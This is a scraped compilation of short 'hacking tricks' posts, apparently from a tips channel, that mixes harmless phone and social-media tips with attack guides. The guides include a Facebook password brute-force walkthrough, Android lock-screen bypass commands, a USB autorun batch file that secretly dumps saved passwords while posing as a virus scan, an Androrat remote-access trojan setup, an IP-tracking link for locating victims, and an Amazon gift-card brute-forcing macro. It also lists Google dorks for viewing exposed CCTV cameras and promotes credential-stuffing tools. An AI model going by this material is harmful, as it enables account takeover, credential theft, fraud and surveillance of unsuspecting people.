Go to your home page in the place “Whats on your mind?” type the following sequence after deleting the ‘+’ sign and press enter
@+[+0+:+0+]
You should have now posted a blank status.

And when your friends ask you about how you did it, don’t forget to share it with them too! After all, you don’t want to become like your friends who never told you!

Now coming to a blank comment! Well, just like blank status signifies they have nothing to post at all, a blank comment signifies two things: either the person doesn’t know what to say (some may say: rendered speechless) or the person doesn’t want to say anything but make it evident that he did see your Facebook status but would like to keep himself out of it while at the same time he understands your status). A blank comment can also signify that you’re left speechless also. So let’s have a look on how to post a blank comment.

Simply type the following while you make sure you’ve pressed and hold the ALT key. Type 0173 (no spaces in between).The final sequence: ALT+0173 and press Enter.

Perhaps you didn’t know but this is the exact same way how you create folders with no name at all in Windows too. Just like posting blank statuses, you don’t need to download any kind of software or write any code for it. Don’t forget not to release the ALT key unless you’ve typed in 0173 completely and lastly, don’t forget to share this piece of information with your friends.
Hope this article helped you.






Enjoy! Follow us for more... 

HOW TO INSTALL AN APP NOT AVAILABLE IN YOUR COUNTRY.


1. Install an app that isn't available in your country
If you're really keen to get an app that's not available in your country then you can still get your hands on it by using a VPN. 'VPN' means 'virtual private network'. It gives you a secure internet connection via private networks in locations outside of your current one.

Basically, a VPN service can make it look like you're accessing the internet from a different location. It's important that you choose a credible VPN. We regularly feature VPN deals in our AndroidPIT Store if you're looking for a good one at a low price.

Once you've downloaded a VPN, select the country whose Play Store you want to access in the VPN app, get the VPN up and running, then open the Play Store app. It should land on the Play Store homepage of the country you selected. Now you can get the app you desire.






Enjoy! Follow us for more... 

How to create tracing link: ?



Register on free web hosting websites who lets  hb to add your own scripts. For e.g., 000webhost, ByteHost, Free Hostia, etc.

Create website by registering a free domain name there. You usually end up in getting sub-domain such as yoursite.freehosting.com, instead of domain like yoursite.com. Make sure the webhost allow you to add your own files.

Now, download this zip file: Track-IP

Extract it and you’ll see three files on IP Trace Code folder. Namely: img.jpg, index.php and log.txt. Upload all three files to your website’s root (public_html) folder.

Now, your website’s link (yoursite.freehosting.com) is the tracking link. Send it to that person and make him/her click on it.

As soon as the person clicks the URL, your log.txt file will trace his/her IP, Browser with timestamp.

You can then track IP using any IP Tracer to get the geolocation of that person







Enjoy! Follow us for more... 

How to safely browse deep web? : Security Tips


You must have heard of dark web or deep web and as you know its a scary place and its full of skilled cyber criminals. So it becomes necessary to secure yourself while visiting this wild part of internet. Today I am going to tell you about some precautions that you should must use while surfing dark web.

Secure Your Browser
Securing your browser must be your top priority as hackers can exploit it to gain access to your machine. So lets talk about some ways by which you can make your browser more hardened.
1. If a website doesn’t use HTTPS, don’t use it.
2. Disable JavaScript using NoScript plugin
3. Disable all the plug ins as they can be used to track/exploit your system
4. Don’t use search Engines like Google which track you. Instead, go for DuckDuckGo which doesn’t keep the records or inject tracking cookies into your browser
5. If you download something from the dark web its ok but consider opening it in a sandbox or a virtual
machine.
6. Don’t use torrent because torrent uses a peer to peer
connection instead of using TOR network.
7. Don’t maximize TOR browser’s windows as it can be used to determine screen size of your device.
Secure your browser even more Enter about:config in your browser tab and press enter. Then make the following changes:

javascript.enabled false

network.http.sendRefererHeader 0

network.http.sendSecureXSiteReferrer false

extensions.torbutton.saved.sendSecureXSiteReferrer false

network.cookie.cookieBehavior 2

browser.cache.memory.enable false

Secure Your Operating System
If your operating systems is easy to hack then it could be a problem…a really really bad problem.
1. Don’t use windows because windows is really very easy to exploit, prefer Linux .
2. Its good to use tor in a virtual machine so you can minimize the damage in case you get infected by some malware.
3. Use a firewall .
4. Keep your system up to date.
Secure Your Identity

hide your identity.
1. If you have to sign up for something, use a
disposable email service such as throwawaymail
2. Choose usernames and passwords carefully. They
should not have any kind of link to your real identity.
3. Send messages in chat rooms only when its
necessary and do not reveal any kind of information.
4. You will eventually find scam sites and phishing sites,
so use your mind and stay away from them.
5. Don’t do something which might grab attentions of legal authorities like watching child porn. Do not
watch child porn at all, even for the sake of curiosty. Stay away from it.
6. If you have to upload an image somewhere, wipe its exif data first. And don’t upload any photos which reveal anything about your personal life. Like the color of your cat.


Still not secure? Here you go!
1. Get a new laptop
2. Get a new USB and install Tails in it. Tails is an Linux distro dedicated to security and privacy.
3. Now install tor and set TOR browser’s security setting to high.
4. Follow all the security measures we have discussed above.
5. Thats all.

That’s all for now. I hope you enjoyed this article.
Keep learning! Stay safe!





Enjoy! Follow us for more... 

Get Fast Google Adsense Approved Tips



Firstly google have certain criteria before you blog or website to approved for google adsense.

note:
Is it not true that the blog should be 6 months old in india to get approved?

How to get approved by google adsense?

1)website must have good design , navigation and also have important pages like
Home , contact , About us(Write your name and address through which you applied the AdSense account)
, privacy policy, policy disclaimer.

2)Design: should be very neat and clean simple blog , Don't give any wired look
Google always want their users to get the best experience while browsing through any website they refer.
Maintaining a clean design with good navigation and user experience will boost your chances of getting AdSense approved in the first attempt itself.
This is one of the major guidelines where lot of people miss the basics.
Google believes that if you maintain professional color scheme on your website,
the user might be willing to come back and click on the relevant ads which are displayed under your content.
So make sure you maintain a neat and clean design before applying to AdSense.
I would recommend you to buy one professional template anywhere and get it installed on your website without effecting the loading speed or easy navigation

3)15 blog post very neat and clean , no copywrite image , rich content no copywrite from any website and before apply
make domain like admin@yourwebsite.com

4)No Third Party Ads or Programs:
Before applying to AdSense, make sure you don’t allow or place any other third party banner ad code on your website. Google (employees) will strictly look into your website manually and they hate seeing some third party ads installed in your website

5)Google Analytics Code: you must link your website to this site and you will get all information about traffic and all.

7)XML Sitemap Page: Installing a sitemap on your website can help search engine bots to index your website faster, which is again a trust factor to bots about the website trustworthiness.

8)Robots.txt:Creating Robots.txt file on your website will get rid of indexing unwanted junk onto Google
fOR MORE INFO JUST GOOGLE ITS.

Statistics show that your account will go through a faster approval process if you have more quality articles on Health, Internet Marketing, Business, Law, Technology, Entrepreneurship, Travel, Lifestyle and Social Media.






Enjoy! Follow us for more...  

HOW TO BOOST YOUR OPERA MINI EVEN WITH POOR NETWORK ?



Browse fast and faster on opera mini like ucwap and uc browser. Follow the steps below

Lunch your browser opera mini

Type this in the address box 'opera:config'

select image to be =NO
Fit text to screen=YES
Loading timeout=10/20
site and sever agent masking=NO
keep styling in Rss feed=NO
Show feed index=NO
Fold linklist=NO
Phone number detection=YES
Minimum phone number=NO
EDITING HERE
Use bitmap font=NO




Enjoy! Follow us for more... 

Bypass Android Pattern Lock from ADB Tool ?



You can bypass or disable your android pattern lock from usinh ADB (Android Debugging Bridge) Tool. You can download this tools from its official website. ADB tools work with your Window PC Linux, You can easily bypass android lockscreen from ADB Tools.

Make Sure USB Debugging is enabled in your android phone. If your Mobile USB Debugging is not enabled in your android phone, you can;t use this method.

1. Download and Install ADB Drivers in your Window PC.

2. Connect Your Android Phone with your Window PC.

3. Open Command Prompt , type adb devices and press enter.

4. Now you see your Device Name with its model number.

5. Type   one by one these commands in your Command Prompt Screen.๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡

▶️ adb shell 

▶️ su     

▶️ rm /data/system/gesture.key

▶️ now enter any pattern in your android phone and you can easily bypass android pattern lockscreen from using adb in your windows

Ready to go





Enjoy! Follow us for more... 

How to change your phone from 3G to 4G¿ (Root-Required)


•Your phone must be rooted

•Install root explorer

•Search for a file called 'persist.radio.lteon'

•Open that file and change it from 'false' to 'true' save

•Reboot your phone.

You will be able to see "LTE/wcdma/gsm (auto connect)" in network mode.





Follow us for more... 

STORM Cracker Software. V 2.6.0.2

First Free And Most Flexible C# User-Configurable Cracking Program. STORM is a cracking program designed to perform website security testing. The author is not responsible for any illegal use of this program. Please report bugs by sending an email to bugs[at]stormapp.org STORM is a cracking program designed to perform website security testing.
The project started in January 2018 by MR.Viper.

Requirements:
Microsoft .NET Framework 4.7.2
Windows 7 or Later


Features:
Supports FTP checking!
Built-in Javascript Executor.
Brotli Decompression.
Possible use both FTP, HTTP stages in one config
Unlimited stages are are supported
Debug form for analyze and check settings, send and receive data
Load up to 20million combo lists!
Supports HTTP/S
Supports Socks 4/5
Supports auto update proxies, when you load fresh proxies program auto update exist proxies
Pass the CloudFlare’s Under Attack Mode.
Features an advanced configuration of all the engine stages by using special variables: in this way user is able to configure correctly the engine for very specialized cases.
Supports fully configurable Keywords Capture (useful in order to get premium account details)
Supports fully configurable Form JavaScript Redirect (useful to get the page where a premium account detail is shown)
Supports multiple additional form redirects
Supports advanced special Keywords Matching Functions
Supports encoding methods:

  • * URLEncode / URLDecode – Description: Encode/Decode an String
  • * Base64 Encode/Decode – Description: Base64 Encode/Decode an String

Supports string-related functions:

  • * Uppercase / Lowercase – Description: Upper/Lower each char of String/Text/Source
  • * Length – Description: Gets the number of characters in the provided String/Text/Source
  • * Trim / TrimStart / TrimEnd – Description: Trim And Replace Spaces at Start/End or Both part of an String/Text/Source
  • * Replace – Description: Replace an string/text/word with an string/text/word
  • * Substring – Description: Extract an string/text by providing start index and optionally length to be extracted till.
  • * CombineText – Description: Combine/Merge several strings/texts, merge order will be the order of provided arguements
  • * IndexOf – Description: Return index of an string/text in in base String/Text/Source
  • * Add – Description: Add an String/Text to the left provided arguement(s)
  • * FindTagVal – Description: Get/Extract text between two strings/word/texts
  • * RegexMatch – Description: Get/Extract Text matched by the provided Regex Pattern Based on .NET
  • * RegexMatches – Description: Get/Extract All Texts matched by the provided Regex Pattern Based on .NET
Supports crypto string methods:
  • * MD5 – Description: Encrypt an String/Text to MD5
  • * SHA – Description: Encrypt an String To SHA-1/SHA-256/SHA-384/SHA-512
  • * HMAC – Description: Encrypt an String to HMAC with several hash types (“MD5” / “RIPEMD160” / “SHA1” / “SHA256” / “SHA384” / “SHA512”)
  • * PBKDF2-HMAC-SHA256 – Description: Encrypt an String to PBKDF2-HMAC-SHA256
  • * PBKDF2-PKCS5 – Description: Encrypt an String to PBKDF2-PKCS5
-Supports other functions (will be more soon):
  • * UnixTime – Description: Return Current Timestamp (like: 1517516792.63398)
  • * UnixTimeToDate – Description: Converts Unix Timestamp to date, like: 2/28/2018
  • * If – Description: Returns one of two values depending on the value of the Boolean expression
  • And much more functions and features.




Download Here ::

GOOGLE RDP METHOD | WORKING 100% | 32 GB RAM RDP |

๐ŸŒ€  ๐ŸŒ€

 Method

Things you will need

1.Temp Mail
2.Ability to read English Steps:

1. Go to https://google.qwiklabs.com/users/sign_up And sign up using TempMail

2. After sign up check TempMail inbox for activation link and sign in. Make sure to check to Remember Me Box

3. Go to https://google.qwiklabs.com/quests/70?event=Your And use code "1q-analytics-67"

4. Go to https://google.qwiklabs.com/focuses/3563?parent=catalog and click start trial and use credits.

5. Wait for it to start and then click go to the console.

6. Login using the info given by the website and Boom you have access to cloud console for 40 mins.

7. Now create A instance and use it for 40 mins Note: The RDP/Account will be deleted after 40 mins Method







Enjoy! Follow us for more... 

how to hack Facebook Account ?



Now Let's go on a our topic.

STEP-1: INSTALL TERMUX APP FROM PLAY STORE OR ANY WHERE OR CLICKHERE

STEP-2: DOWNLOAD FBBRUTE FILES FROM GIVEN LINK CLICK HERE

STEP-3: GOTO FACEBOOK AND COPY FACEBOOK ID WHICH YOU WANT TO HACK

STEP-4: GOTO BROWSER AND SEARCH "FIND YOUR FACEBOOK ID" AND OPEN WEBSITE

STEP-5: PASTE COPIED VICTIM ID INTO "SEARCHBOX" AND CLICK ON"FIND"

STEP-6: AFTER THAT YOU GET FACEBOOK PERSONAL NUMERIC ID

STEP-7: COPY YOUR "FACEBOOK PERSONAL NUMERIC ID"

STEP-8: GOTO TERMUX APP AND TYPE "pkg update" AND HIT ENTER

STEP-9: AFTER THAT ASK "Y/N" WRITE "y" AND HIT ENTER

STEP-10: NOW TYPE "pkg upgrade" AND HIT
ENTER

STEP-11: NOW TYPE "apt install python2" AND HIT ENTER

STEP-12: NOW TYPE"apt install python2-dey" AND HIT ENTER

STEP-13: NOW SEE YOUR STORED LOCATION OF "fbbrute" AND COME BACK IN TERMUX APP

STEP-14: NOW TYPE "cd /sdcard/fbbrute" AND HIT ENTER

STEP-15: NOW TYPE s AND HIT ENTER

STEP-16: NOW TYPE "python2 fbbrute.py" AND HIT ENTER

STEP-17: NOW PASTE "FACEBOOK PERSONAL NUMERIC ID" AND HIT ENTER

STEP-18: NOW TYPE "password.txt" AND HIT ENTER

STEP-19: WAIT AND YOU GET YOUR VICTIMS PASSWORD

STEP-20: COPY VICTIMS PASSWORD AND GOTO FACEBOOK

STEP-21: NOW TYPE VICTIMS"FACEBOOK PERSONAL NUMERIC ID AND PASTE COPIED VICTIMS PASSWORD AND CLICK ON LOGIN BUTTON

NOW YOU SUCCESSFULLY HACKED FACEBOOK ACCOUNT






Enjoy! Follow us for more... 

HOW TO UNLOCK LOCK PATTERN USING COMMAND PROMPT ?

๐Ÿ”ฐ  ๐Ÿ”ฐ

๐Ÿ”ท Steps :-

1⃣ Connect your android phone to your computer.

2⃣ Open Command prompt administrator.

3⃣ Now in command prompt window type following code carefully  adb shell cd/data/data/com.android.providers.settings/databases sqlites settings.db  update system set value=0 where name=’lockpatternautolock’; update system set value=0 where name=’lockscreen.lockedoutpermanently’; .quit

4⃣ Now you will see some screen as shown below and then you can reboot your phone and now when your android starts again, then try unlocking it using any random pattern and it will unlock and work pretty fine.

5⃣ If you face any problem repeat same steps but instead of the above code tru using  adb shell rm/data/system/gesture.key and the press enter and now reboot your device to see if it works






Enjoy! Follow us for more... 

SENTRY MBA The most commonly used attack tool for credential stuffing

Sentry MBA is an automated attack tool used by cybercriminals to take over user accounts on major websites. With Sentry MBA, criminals can rapidly test millions of usernames and passwords to see which ones are valid on a targeted website. The tool has become incredibly popular — the Shape Security research team sees Sentry MBA attack attempts on nearly every website we protect.

An attack using Sentry MBA has three phases:
  • Targeting and attack refinement.
  • Automated account checking.
  • Monetization. Sentry MBA (and the criminal ecosystem that supports it) dramatically improve criminal productivity during the first two phases.

Sentry MBA in Credential Stuffing Attacks
A list of usernames and passwords is at the heart of every Sentry MBA attack. In Sentry MBA parlance, these are called “combo” lists. If the combo list has credentials that were valid on another website (e.g. via publicized breaches at eBay, Sony, and Ashley Madison or through phishing techniques), the attack is called “credential stuffing.” Credential stuffing works because Internet users routinely reuse passwords across web accounts. Verizon’s 2015 data breach report cites the use of stolen credentials as the most common attack action used against web applications today.


1. Targeting and Attack Refinement
Before it can test account credentials, Sentry MBA must be configured to understand the targeted login page. A Sentry MBA “config” file contains, among other items, the url for the website’s login page, field markers to help navigate form elements, and rules for valid password constructions. A number of forums offer a wide variety of working configurations for various websites. 
Once the attacker has a basic working configuration, Sentry MBA offers tools to optimize and test the attack setup against the live target website. For example, the tool can be configured to recognize certain keywords associated with a website’s responses to successful and unsuccessful login attempts. If the targeted page includes a CAPTCHA test, Sentry MBA can defeat the CAPTCHA with its optical character recognition module or with an optional database containing thousands of possible CAPTCHA images and answers. This YouTube video demonstrates the process of tuning Sentry MBA to solve CAPTCHA.

2. Automated Account Checking
Once the site configuration is optimized, attackers need only add their “combo” file and a “proxy” file to Sentry MBA to commence their attack.
Combo files are simply lists of usernames and passwords. The Darknet and open web offer many options for acquiring stolen lists of usernames and passwords. Fresh lists are often sold at a premium but other lists can be freely downloaded. 
Proxy files are lists of computers used by Sentry MBA to send login attempts to a targeted site. These lists, like combo lists, are readily available on the open web and the Dark net. Proxies make attack detection and defense far more difficult. Specifically, they undercut two common application defense strategies: IP reputation filtering and rate limiting.
How do proxies defeat IP reputation filtering (also known as “blacklisting”)? Sentry MBA proxies are compromised computers that are typically used without authorization. Cybercriminals constantly work to gain access to fresh proxies that can help evade blacklists. An analysis of a proxy-based attack at one Shape customer revealed that 60% of the proxies used in the attack were new each day. Blacklists can’t be updated quickly enough to detect compromised computers and stop them from joining attacks.
Proxies also help attackers evade defenses that rely on rate limiting. These defenses fail because the attacker’s login attempts appear to come from a large number of different computers. Sentry MBA can be tuned to ensure that no individual proxy sends too many requests, which makes rate limiting ineffective.
With a working configuration, combos, and proxies, the attack can commence. Sentry MBA coordinates proxies and collects information on which credentials successfully open an account. It even checks for what assets are available in an account and notifies the attacker when hits occur. After all the credentials in the combo list have been checked, Sentry MBA’s role in the attack is over.‍

3. Monetization
Once the cybercriminal has working credentials, they need a way to make money from their victims.Monetization strategies can take many forms. The retailer mentioned earlier was defrauded when cybercriminals transferred stored-value gift card balances out of compromised accounts to cards controlled by the cybercriminal. Sites such as giift.com, giftcardzen.com, and cardpool.com make it easy to liquidate these fraudulent cards for cash or merchandise.
Many other monetization schemes are available to cybercriminals, including extortion, account funds transfers, and acquisition of credit card information, to name a few. As cybercriminals find increasingly creative ways to monetize attacks, more and more websites become attractive targets.











Deep Web Anonymous Email Services Links

๐ŸŒŸ๐ŸŒŸ


http://zrwxcayqc4jgggnm.onion/ – Email – Adunanza OnionMail Server, If you want to get new anonymous email for your business or personal discussion then you may try this Darknet onion link and easily can create your brand new email address.

http://cwu7eglxcabwttzf.onion/ – Tor Emails – Confidant Mail: this is open source non-SMTP cryptographic email service, which supports optimized large file attachment, this email deep web sites offer the easiest way for PGP encryption. When you create your new account, then email service also create one public key automatically for you. For more information visit given email service deep web links.

http://scryptmaildniwm6.onion/ – Emails – Scryptmail – This end to end encrypted anonymous email service that now stored metadata, If you are highly privacy oriented person and looking any premium anonymous email service, you may try Scryptmail, but before buying any premium access you may try 7 days trial.

http://cadamailgxsy6ykq.onion/ – Email – Cicada Mail – alternative onion email service which also claiming for privacy protection. But at my site explore time, website homepage has notification about ” Site is not fully cunctional”.

http://torbox3uiot6wchz.onion/ – Tor Emails – TorBox: This is another alternative email service which you can access into Tor network and outside Tor network you can’t access this email service. If you are looking any email service which can work into hidden internet environment, then try this email service.




Enjoy! Follow us for more... 

Top websites to get 10GB to 100GB Cloud storage.

๐Ÿ”ฅ ๐Ÿ”ฅ

Yunpan.360.cn to get 360GB of free storage. (can be extended up to 36TB by downloading the PC and Android/iOS clients)

Ozibox.com to get 100GB of free storage.

SurDoc.com to get 100GB of free storage.

Shared.com to get 100GB of free storage.

Adrive.com to get 50GB of free storage

Mega.co.nz to get 50GB of free storage.

Hubic.com to get 25GB of free storage.

Firedrive.com to get 20GB of free storage.

Onedrive.live.com to get 15GB of free storage.

Copy.com to get 15GB of free storage.

Mediafire.com to get 10GB of free storage. (40GB more available with other activities)

Pcloud.com to get 10GB of free storage (10GB more available with other activities)

Box.com to get 10GB of free storage.




Enjoy! Follow us for more... 

How To Unroot Your Android with Katlego Keita Using SuperSU ?


✔️ Launch The SuperSU App. ..

✔️ Tap The "Settings" Tab.

✔️ Scroll Down To The "Cleanup" Section.

✔️ Tap "Full Unroot".

✔️ Read The Confirmation Prompt And Then Tap "Continue".

✔️ Reboot Your Device Once SuperSU Closes.

⚠️ Use An Unroot App If This Method Fails.





Follow us for more... 

How To Hack Android Phones With Androrat ?



In this post I am going to show you how to hack Android phones withAndrorat. In our tutorials we only EVER hack our own systems as a proof of concept and never engage in any black hat activity

Step 1: Create an account on noip.com

Step 2: Create a host on noip.com and enter Hostname and click Add Host

Step 3: Now do port forwarding on your network. Port forwarding settings changes on each moderm, so google your moderm and find out how to do port forwarding

Step 4: Download Androrat Binder and enter the Hostname  and Port. Name the file and click Go. If you want to inject this file with another .apk file then go to Build + Bindtab name apk title and browse the location of the .apk and click Go

Step 5: Now download DUC (Dynamic DNS Update Client for Windows) and install

Step 6: Open DUC and enter the host details which you have created in noip.com

Step 7: Download and run Androrat Project. Open Server tab on top and enter theport which you use on noip.com

Step 8: Now run the .apk which is created by Androrat Binder on a Android Mobile





Done,  Follow us for more... 

Amazon Gift Card Code Generator + Checker [FREE] [HQ] [VERY FAST]

๐ŸŒ€  ๐ŸŒ€

free giftcard code generator with a checker!

Information : I am using firefox version 55.0 and imacros version 9.0.3. It is likely NOT TO work for you if you have different version!

1, Go to https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/

 (If it wont work with your browser, download the old version of firefox: )

https://wiki.imacros.net/iMacros_for_Firefox_Legacy#Version_History

Imacros9.0.3. http://download.imacros.net/imacros_for_firefox-9.0.3-fx.xpi

3, Right click on one of the macros and click on "Edit Macro"

4, Be sure to add something to your cart, click on it, fill your address in then go to the part where you can fill giftcards in as a payment option. -
 https://www.amazon.com/gp/buy/payselect/handlers/display.html?hasWorkingJavascript=1

5, Now paste this:

SET !ERRORIGNORE YESSET !DATASOURCE C:\Users\username\Documents\iMacros\Datasources\Codes.txtSET !DATASOURCE_COLUMNS 1SET !DATASOURCE_LINE {{!LOOP}}SET !EXTRACT_TEST_POPUP NOSET !TIMEOUT_STEP 0TAG POS=1 TYPE=input ATTR=ID:gcpromoinput CONTENT={{!COL1}}TAG POS=1 type=input ATTR=id:button-add-gcpromo

be sure to replace the source in the 2nd line to your source.

IMPORTANT:

If you want the script to automatically try to go forward in the menu (so when amazon would redirect you back to your cart or something like that) then use this script:

SET !ERRORIGNORE YESSET !DATASOURCE C:\Users\username\Documents\iMacros\Datasources\Codes.txtSET !DATASOURCE_COLUMNS 1SET !DATASOURCE_LINE {{!LOOP}}SET !EXTRACT_TEST_POPUP NOSET !TIMEOUT_STEP 0TAG POS=1 TYPE=span ATTR=id:"nav-cart-count"TAG POS=1 type=input ATTR=class:"a-button-input"TAG POS=1 type=a attr=class:"a-declarative a-button-text"TAG POS=1 type=input attr=value:"Continue"TAG POS=1 TYPE=input ATTR=ID:gcpromoinput CONTENT={{!COL1}}TAG POS=1 type=input ATTR=id:button-add-gcpromo

Checker Additions:

1, If you have copied every generated codes, paste them into a new sheet at sheets.google.com (so it will paste everything under each other)

2, Now copy those from top to bottom and paste them into a text file
3, Change the source in the second line so its the place of the script above.
4, Run your code and have fun.





Enjoy ! Follow us for more... 

HOW TO MAKE A USB STEALER ?

​​๐Ÿ”ฐ๐Ÿ”ฐ

◼️TUTORIAL:

open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf

open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat

copy the autorun and launch file to your USB

go to http://www.nirsoft.net/ and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB

click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer—-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer





Enjoy! Follow us for more... 

Buster - Find Emails Of A Person And Return Info Associated With Them.


Note: This information only for education purpose only

Buster is a simple OSINT tool used to:

  • Get social accounts from various sources(gravatar,about.me,myspace,skype,github,linkedin,avast)
  • Get links to where the email was found using google,twitter,darksearch and paste sites
  • Get domains registered with an email (reverse whois)
  • Generate possible emails and usernames of a person
  • Find the email of a social media account
  • Find emails from a username
  • Find the work email of a person using hunter.io



Installation-_  

clone the repository:
$ git clone git://github.com/sham00n/buster

Once you copy of the source, you can install it with:
$ cd buster/
$ python3 setup.py install
$ buster -h

Usage examples

  • Get info of a single email(exists or not,social media where email was used,data breaches,pastes and links to where it was found)

$ buster -e target@example.com

Query for list of emails:
$ buster --list emails.txt

  • Generate emails that matches the pattern and checks if they exist or not(use the -a argument if you have more info to add(ex: -a nickname fav_color phone #)

$ buster -e j********9@g****.com -f john -l doe -b ****1989

  • Generate usernames (use with -o option and input the file to recon-ng's profiler module)

$ buster -f john -m james -l doe -b 13071989

  • Generate emails (use -v if you want to validate and get info of each email)

$ buster -f john -m james -l doe -b 13071989 -p gmail.com yahoo.com

  • Generate 100+ emails in the formatusername@provider.com and returns the valid ones(use -p if you dont want all 100+)

$ buster -u johndoe

  • Generate a company email and returns info associated with it

$ buster -f john -l doe -c company.com





Follow us for more... 

BitDefender Premium Lifetime Method !



1. Go to link(https://central.bitdefender.com/home) and Register


3. Use a temporary email.

4. Paste your email, do the captcha and click "Get It Now"

5. You will get an email that will look like this: (https://imgur.com/a/M1915oz)

6. Click "Install BitDefender"

7. You will be redirected to your already existing bitdefender account

8. This message will pop up: (https://imgur.com/a/0lbhgn8), click "Apply"

9. Now you have bitdefender for 3 months!

10. When you want to renew your subscription, repeat step 2-8 , Sometimes you will never recieve the email or it will take a long time. If this happens try to use a VPN, delete cookies and try again.

This method only works up to 90 days, so if you use this method when you have 45 days left, the subscription will be renewed to 90 days again"
REPEATABLE FOREVER



Follow is for more... 

Spying CCTV cameras through Google ?

๐Ÿ“Œ This information only for education purpose only. Don't misuse it.๐Ÿ”ฐ

๐Ÿ‘‰ Google Dorks one of most easy, fun and powerful hacking techniques, online.

On Internet, Websites are not only to be hacked, Websites are just part of Internet.
There are many other products like Refrigerator, CCTV Cameras, Automated Doors, Televisions, Power Plants, etc. that are connected to Internet, and some of them could be accessed through google.
So, right now we will be discussing about CCTV Cameras.
Following are some Google Keyword Searches that you can simply type in into Google Search Box and find a CCTV live!

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”


Enter any of these searches in Google Search Box.

Search !

Click on any of link!

And you will see live stream of Random CCTV !

IF YOU WANT TO WATCH CCTV OF SOME SPECIFIC ORGANISATION  ... ADD NAME OF ORGANISATION AFTER THAT GOOGLE DORK !
IF IT WILL BE VULNERABLE,  YOU WILL FIND IT !





Enjoy ! Follow us for more...

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...